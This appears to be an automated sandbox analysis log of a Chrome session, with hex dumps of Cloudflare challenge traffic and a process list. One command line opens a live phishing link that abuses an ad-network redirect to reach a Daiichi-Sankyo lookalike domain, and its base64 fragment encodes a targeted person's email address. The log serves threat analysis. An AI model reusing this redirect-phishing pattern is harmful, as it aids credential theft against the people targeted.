                                        2025-01-07 08:16:28 UTC16170OUTData Raw: 61 31 6d 77 32 68 6e 64 48 79 54 6d 45 24 45 41 31 6a 48 6e 31 79 65 33 41 33 72 31 6e 31 61 30 39 76 31 54 72 4b 72 33 74 31 78 77 79 77 61 2b 31 33 41 48 77 31 39 41 36 39 67 77 61 6b 31 38 31 70 79 61 2b 41 50 65 62 79 33 6e 31 68 65 53 77 33 42 31 54 65 4b 2d 33 41 31 52 65 54 66 51 37 31 67 65 67 4d 61 46 31 79 31 31 76 33 53 31 63 76 79 79 47 74 77 24 38 6d 54 33 38 45 68 31 6a 77 33 4d 31 46 31 70 58 33 48 31 52 31 54 31 48 30 31 35 31 41 50 31 43 33 63 61 62 50 65 6b 31 5a 31 48 2d 33 79 33 4e 64 39 79 31 72 31 71 65 61 2d 47 42 31 37 65 62 7a 31 45 41 49 31 72 68 75 37 31 4f 65 67 31 33 48 33 36 31 66 76 33 72 31 7a 74 79 47 47 30 65 78 4d 34 62 76 65 31 24 38 42 51 47 50 33 31 31 6e 65 47 2d 31 58 76 6a 76 47 50 65 61 31 4b 4d 31 67 76 51 31 6a
                                        Data Ascii: a1mw2hndHyTmE$EA1jHn1ye3A3r1n1a09v1TrKr3t1xwywa+13AHw19A69gwak181pya+APeby3n1heSw3B1TeK-3A1ReTfQ71gegMaF1y11v3S1cvyyGtw$8mT38Eh1jw3M1F1pX3H1R1T1H0151AP1C3cabPek1Z1H-3y3Nd9y1r1qea-GB17ebz1EAI1rhu71Oeg13H361fv3r1ztyGG0exM4bve1$8BQGP311neG-1XvjvGPea1KM1gvQ1j
                                        2025-01-07 08:16:28 UTC318INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:28 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 26288
                                        Connection: close
                                        cf-chl-gen: BTbfWOufqbFsNzocdKjLtpYPM2GcR9rGc0iYc9hrj+5BpfRXfy0NYewppIblx+IJoDY=$gUKBZEnbyLWYCkom
                                        Server: cloudflare
                                        CF-RAY: 8fe2817f7a245e6e-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:28 UTC1051INData Raw: 76 6f 4f 47 77 4c 53 4c 68 72 61 47 6f 34 36 75 6a 4b 33 42 72 4d 71 7a 77 4a 48 51 76 4e 79 56 31 4d 66 59 31 64 33 4c 77 72 2f 58 32 74 4f 39 75 4e 58 41 37 4c 6e 65 75 4f 72 44 76 4b 37 55 30 75 62 74 78 73 6e 72 32 4f 7a 4a 41 4f 72 75 30 38 76 43 35 4f 49 48 2f 64 4c 61 31 65 6a 35 33 4d 2f 37 36 65 44 39 33 65 66 6e 43 41 6a 6e 30 64 73 49 2f 4f 77 4b 39 4f 44 79 37 4f 33 79 2f 65 66 37 43 51 6a 30 49 76 67 48 43 67 62 39 44 43 55 6d 45 4f 37 76 46 52 73 36 4f 77 6b 72 43 6a 44 37 4f 78 52 44 42 44 6b 53 52 67 63 70 4b 54 74 43 46 68 73 2f 49 54 38 6d 4b 53 63 52 4d 69 42 44 4b 42 52 48 57 46 64 58 4c 46 4d 39 58 6c 6c 46 56 57 59 79 51 32 55 31 58 30 68 71 4c 31 31 61 63 7a 4a 4c 56 47 45 70 5a 57 64 45 56 45 52 34 64 6d 6c 72 58 6a 35 53 66 59 49
                                        Data Ascii: voOGwLSLhraGo46ujK3BrMqzwJHQvNyV1MfY1d3Lwr/X2tO9uNXA7LneuOrDvK7U0ubtxsnr2OzJAOru08vC5OIH/dLa1ej53M/76eD93efnCAjn0dsI/OwK9ODy7O3y/ef7CQj0IvgHCgb9DCUmEO7vFRs6OwkrCjD7OxRDBDkSRgcpKTtCFhs/IT8mKScRMiBDKBRHWFdXLFM9XllFVWYyQ2U1X0hqL11aczJLVGEpZWdEVER4dmlrXj5SfYI
                                        2025-01-07 08:16:28 UTC1369INData Raw: 55 31 5a 47 34 73 73 33 42 33 62 7a 56 74 2b 53 38 6f 64 6d 2f 35 62 6e 4b 32 39 6e 6d 78 2b 4f 2f 35 4d 72 42 36 66 44 49 78 65 33 30 79 4d 6e 78 39 2b 33 67 42 62 67 49 75 75 4c 6c 2f 74 73 4c 33 73 59 4a 42 4f 33 75 44 67 37 51 33 78 6f 45 45 77 73 4f 36 67 7a 75 33 43 48 39 42 50 63 65 45 78 73 6e 38 2f 34 74 42 4f 4d 65 37 77 37 2b 4a 54 58 79 37 42 4d 30 4c 77 38 51 38 7a 55 65 43 51 77 54 41 76 34 66 46 41 51 61 42 42 59 67 4a 7a 67 4d 50 79 6c 49 4b 6c 49 73 4c 54 46 54 45 45 5a 51 47 52 4e 4b 53 53 59 58 54 6b 35 65 4b 30 4a 68 4f 69 52 53 59 7a 35 64 57 69 64 41 57 6d 70 4d 61 58 4e 79 4c 56 42 47 59 6d 34 7a 4f 30 6b 7a 64 31 45 32 64 56 75 42 57 30 46 6b 50 34 64 42 69 48 57 43 62 57 71 4c 58 31 39 73 68 45 39 4c 64 49 39 72 62 4a 4f 52 56 35
                                        Data Ascii: U1ZG4ss3B3bzVt+S8odm/5bnK29nmx+O/5MrB6fDIxe30yMnx9+3gBbgIuuLl/tsL3sYJBO3uDg7Q3xoEEwsO6gzu3CH9BPceExsn8/4tBOMe7w7+JTXy7BM0Lw8Q8zUeCQwTAv4fFAQaBBYgJzgMPylIKlIsLTFTEEZQGRNKSSYXTk5eK0JhOiRSYz5dWidAWmpMaXNyLVBGYm4zO0kzd1E2dVuBW0FkP4dBiHWCbWqLX19shE9LdI9rbJORV5
                                        2025-01-07 08:16:28 UTC1369INData Raw: 6e 74 79 65 34 73 48 59 70 2b 76 70 71 65 44 5a 75 37 44 50 37 74 37 68 74 63 50 74 73 73 76 75 78 76 57 37 32 65 7a 32 76 76 7a 52 2b 74 44 6d 39 77 48 6c 41 75 54 6d 35 67 77 48 36 2b 76 6c 41 41 51 4d 7a 67 66 6f 36 50 50 59 44 2f 73 57 2b 65 77 68 38 41 2f 79 2b 50 6e 30 47 75 45 6b 41 67 50 36 41 43 30 50 45 69 59 68 4d 6a 63 30 4c 2f 59 5a 2b 53 72 34 46 43 6a 35 4c 54 4d 53 41 42 63 62 51 68 73 6d 49 69 73 49 44 67 46 52 4d 42 4a 4b 4d 52 45 6c 55 45 5a 53 55 6a 46 50 46 52 56 4b 50 7a 38 63 49 31 46 42 4a 6a 78 47 49 6c 56 62 4f 69 59 2f 51 32 70 44 54 69 56 79 51 44 34 74 57 45 52 74 57 6d 35 70 65 6e 78 61 56 6e 74 68 66 32 39 79 67 56 4e 62 57 47 68 66 66 49 32 42 68 6b 4e 70 66 59 56 55 6c 6c 52 56 62 32 74 62 6a 31 6d 47 65 58 39 39 6d 71 53
                                        Data Ascii: ntye4sHYp+vpqeDZu7DP7t7htcPtssvuxvW72ez2vvzR+tDm9wHlAuTm5gwH6+vlAAQMzgfo6PPYD/sW+ewh8A/y+Pn0GuEkAgP6AC0PEiYhMjc0L/YZ+Sr4FCj5LTMSABcbQhsmIisIDgFRMBJKMRElUEZSUjFPFRVKPz8cI1FBJjxGIlVbOiY/Q2pDTiVyQD4tWERtWm5penxaVnthf29ygVNbWGhffI2BhkNpfYVUllRVb2tbj1mGeX99mqS
                                        2025-01-07 08:16:28 UTC1369INData Raw: 73 44 4d 76 4e 7a 45 30 4d 44 77 79 4e 54 45 76 73 7a 59 79 4e 4c 51 33 4d 33 33 38 41 48 36 39 41 54 78 32 2f 62 50 35 4e 58 30 42 4f 55 46 34 4d 72 69 37 65 6e 79 44 39 58 49 31 64 6a 4c 39 76 50 75 48 67 34 4d 34 42 76 32 2b 64 73 69 2b 52 51 6e 4a 78 4d 73 44 69 67 59 49 2f 6b 6f 2f 51 77 4b 45 41 41 7a 4e 77 49 37 46 77 38 4e 4f 55 45 62 46 69 31 41 4e 55 4d 32 41 41 6c 44 53 67 51 4c 52 31 42 47 50 44 4e 47 45 67 77 66 4b 43 55 56 57 68 6f 30 47 56 6c 62 58 30 70 4d 51 6b 30 58 4c 31 31 53 52 46 30 31 61 43 64 4e 58 55 77 38 62 32 56 51 4e 47 4e 78 56 6a 6b 77 64 56 6f 76 4e 48 6c 65 4e 7a 68 39 59 6b 41 2f 4f 57 4a 67 52 47 6d 44 61 33 5a 6c 66 55 70 53 63 6c 47 4a 5a 45 2b 56 59 56 46 58 62 6d 32 55 58 33 78 63 61 6d 47 59 67 49 56 7a 64 48 47 4c
                                        Data Ascii: sDMvNzE0MDwyNTEvszYyNLQ3M338AH69ATx2/bP5NX0BOUF4Mri7enyD9XI1djL9vPuHg4M4Bv2+dsi+RQnJxMsDigYI/ko/QwKEAAzNwI7Fw8NOUEbFi1ANUM2AAlDSgQLR1BGPDNGEgwfKCUVWho0GVlbX0pMQk0XL11SRF01aCdNXUw8b2VQNGNxVjkwdVovNHleNzh9YkA/OWJgRGmDa3ZlfUpSclGJZE+VYVFXbm2UX3xcamGYgIVzdHGL
                                        2025-01-07 08:16:28 UTC1369INData Raw: 37 51 39 4f 6a 78 77 74 57 33 31 37 48 37 37 37 62 30 33 74 6d 37 31 39 72 78 77 51 4c 65 2b 73 54 67 2b 50 7a 48 34 51 58 78 43 65 76 52 44 67 6e 49 43 78 58 52 37 2f 6f 49 2b 76 62 62 39 4f 6f 4f 38 51 48 32 34 75 54 7a 47 66 6b 4a 2f 68 2f 6c 44 52 6f 62 4d 42 34 6a 4d 67 48 70 38 52 59 48 50 43 7a 32 4e 50 55 65 51 76 77 50 2f 68 63 52 4e 54 59 2b 4e 41 4d 4d 51 41 77 4e 4f 6c 45 6d 56 53 5a 49 54 52 46 4b 54 31 4a 4d 56 6c 42 4a 4e 6c 39 66 49 6b 49 6a 5a 53 51 68 56 47 4a 6b 50 7a 5a 67 5a 69 4a 6a 5a 47 74 6f 58 6d 64 74 65 47 70 36 54 57 78 55 63 44 35 61 62 6f 45 2b 51 6b 35 36 52 46 4b 4b 68 6b 68 61 6a 49 43 49 5a 6b 2b 49 5a 4a 42 70 69 32 6c 69 69 49 78 61 6b 57 71 65 58 46 5a 30 6d 70 31 79 70 70 64 6b 59 61 4f 6b 66 5a 53 61 6e 34 47 67 69
                                        Data Ascii: 7Q9OjxwtW317H777b03tm719rxwQLe+sTg+PzH4QXxCevRDgnICxXR7/oI+vbb9OoO8QH24uTzGfkJ/h/lDRobMB4jMgHp8RYHPCz2NPUeQvwP/hcRNTY+NAMMQAwNOlEmVSZITRFKT1JMVlBJNl9fIkIjZSQhVGJkPzZgZiJjZGtoXmdteGp6TWxUcD5aboE+Qk56RFKKhkhajICIZk+IZJBpi2liiIxakWqeXFZ0mp1yppdkYaOkfZSan4Ggi
                                        2025-01-07 08:16:28 UTC1369INData Raw: 54 31 63 66 79 32 50 48 78 33 64 54 70 33 2b 38 45 39 76 33 52 41 67 48 62 77 2f 34 44 33 39 6b 45 43 64 48 68 44 51 7a 53 34 75 45 52 2b 39 67 4b 42 68 59 58 47 67 44 77 47 77 41 43 38 74 38 48 48 68 34 72 46 77 72 37 41 51 63 51 4a 67 34 64 45 78 63 33 4d 42 66 34 43 68 4d 77 45 54 77 7a 4e 79 45 65 4c 7a 67 5a 4a 6a 35 49 4d 30 51 2b 51 43 4d 65 52 45 64 4b 46 45 30 79 44 31 4d 78 54 56 4a 54 4f 54 73 72 58 31 4d 39 56 6c 39 65 52 44 56 67 50 56 4a 49 57 47 78 66 5a 6a 70 71 61 55 51 73 5a 32 74 49 51 6d 78 78 4f 6b 70 31 64 44 74 4c 53 6e 6c 6b 51 58 4a 75 66 6e 39 6c 5a 31 68 68 5a 59 47 43 57 57 6c 74 68 34 2b 4a 68 32 57 4c 65 4a 52 37 57 58 57 57 58 48 71 4d 67 33 53 6b 66 5a 32 50 6c 58 4b 69 6f 34 4b 46 72 4a 65 4f 6e 61 64 73 71 35 43 53 68 4c
                                        Data Ascii: T1cfy2PHx3dTp3+8E9v3RAgHbw/4D39kECdHhDQzS4uER+9gKBhYXGgDwGwAC8t8HHh4rFwr7AQcQJg4dExc3MBf4ChMwETwzNyEeLzgZJj5IM0Q+QCMeREdKFE0yD1MxTVJTOTsrX1M9Vl9eRDVgPVJIWGxfZjpqaUQsZ2tIQmxxOkp1dDtLSnlkQXJufn9lZ1hhZYGCWWlth4+Jh2WLeJR7WXWWXHqMg3SkfZ2PlXKio4KFrJeOnadsq5CShL
                                        2025-01-07 08:16:28 UTC1369INData Raw: 7a 4f 6e 63 7a 39 6a 73 34 64 50 51 38 65 58 44 37 4f 66 6f 32 77 76 6e 37 63 6f 4c 37 66 44 7a 36 50 4c 36 44 76 41 47 2b 78 45 66 39 50 7a 76 2b 50 34 42 33 76 77 64 42 76 63 42 41 67 6b 4d 41 51 6b 4e 41 41 45 4d 45 69 73 5a 45 52 55 74 2b 78 45 63 39 51 41 56 48 6a 59 52 47 69 63 36 45 52 34 6d 4b 42 30 6a 4c 45 45 51 4f 69 34 67 4b 55 6b 79 4a 45 38 78 4e 6b 34 70 4e 7a 6f 72 48 44 77 2b 48 45 55 2b 51 6a 4d 6f 55 6b 56 49 4f 55 64 4d 59 6b 46 4c 55 32 5a 42 54 6c 46 70 4f 45 35 56 52 7a 68 53 57 56 78 56 64 56 35 66 52 47 42 68 56 46 6c 64 5a 55 4f 44 61 47 6c 74 63 57 70 74 59 47 56 76 63 6e 4e 59 63 58 69 4f 62 58 4e 2f 6b 56 78 37 67 46 70 67 66 49 47 45 66 5a 4b 47 6e 71 65 68 69 6e 74 6f 69 49 32 6d 66 59 36 53 6b 33 53 50 6d 36 31 34 6c 70 71
                                        Data Ascii: zOncz9js4dPQ8eXD7Ofo2wvn7coL7fDz6PL6DvAG+xEf9Pzv+P4B3vwdBvcBAgkMAQkNAAEMEisZERUt+xEc9QAVHjYRGic6ER4mKB0jLEEQOi4gKUkyJE8xNk4pNzorHDw+HEU+QjMoUkVIOUdMYkFLU2ZBTlFpOE5VRzhSWVxVdV5fRGBhVFldZUODaGltcWptYGVvcnNYcXiObXN/kVx7gFpgfIGEfZKGnqehintoiI2mfY6Sk3SPm614lpq
                                        2025-01-07 08:16:28 UTC1369INData Raw: 4e 66 69 32 51 58 65 2f 76 59 4e 41 77 73 46 45 4f 55 49 30 78 48 50 45 77 30 58 46 42 44 62 47 64 63 62 46 53 48 76 45 4f 51 48 49 51 45 49 48 41 6b 6c 2b 41 38 69 2b 43 6f 74 42 41 45 74 4e 51 55 5a 46 42 59 5a 4f 50 4d 77 48 54 6b 4e 49 7a 59 4e 48 53 34 41 4d 45 6b 6e 42 78 56 46 54 52 30 35 4a 44 45 6e 54 41 77 2b 55 42 42 44 57 6c 51 33 4d 44 30 79 47 46 70 4b 48 45 30 78 51 79 5a 54 58 57 6b 6a 57 54 74 50 61 56 46 51 63 6c 46 64 52 6c 4d 7a 51 58 46 36 53 57 56 4b 5a 6a 68 70 55 56 39 43 66 33 6d 47 50 33 56 62 61 34 57 44 62 49 74 74 65 46 46 76 54 31 32 4e 6c 58 57 41 6d 59 4a 58 69 57 61 61 66 48 4a 62 66 31 39 74 6e 61 4f 46 6b 58 4b 6d 69 48 35 6e 6c 6d 69 5a 65 71 36 51 69 6d 2b 54 63 34 47 78 75 71 2b 6c 68 72 71 63 6c 6e 75 71 66 4b 32 4f
                                        Data Ascii: Nfi2QXe/vYNAwsFEOUI0xHPEw0XFBDbGdcbFSHvEOQHIQEIHAkl+A8i+CotBAEtNQUZFBYZOPMwHTkNIzYNHS4AMEknBxVFTR05JDEnTAw+UBBDWlQ3MD0yGFpKHE0xQyZTXWkjWTtPaVFQclFdRlMzQXF6SWVKZjhpUV9Cf3mGP3Vba4WDbItteFFvT12NlXWAmYJXiWaafHJbf19tnaOFkXKmiH5nlmiZeq6Qim+Tc4Gxuq+lhrqclnuqfK2O


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.449774104.18.94.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:28 UTC597OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/21577938:1736234858:tqilWgxS_EsW8SSjchFDEnaIce_aADwik1qCA_CqtGY/8fe2815f5f9a43d9/xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:29 UTC379INHTTP/1.1 404 Not Found
                                        Date: Tue, 07 Jan 2025 08:16:29 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cf-chl-out: mbQiZ4PoFzdrsirPmycHli7+IztmFkP/Wcg=$DqBOGEKkPqqNLmoY
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8fe2818589d78c5f-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:29 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Click to jump to process

                                        Click to jump to process

                                        Click to jump to process

                                        Target ID:0
                                        Start time:03:16:04
                                        Start date:07/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:2
                                        Start time:03:16:09
                                        Start date:07/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2220,i,6973843325363131521,10193747245632863849,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:3
                                        Start time:03:16:15
                                        Start date:07/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ=="
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        No disassembly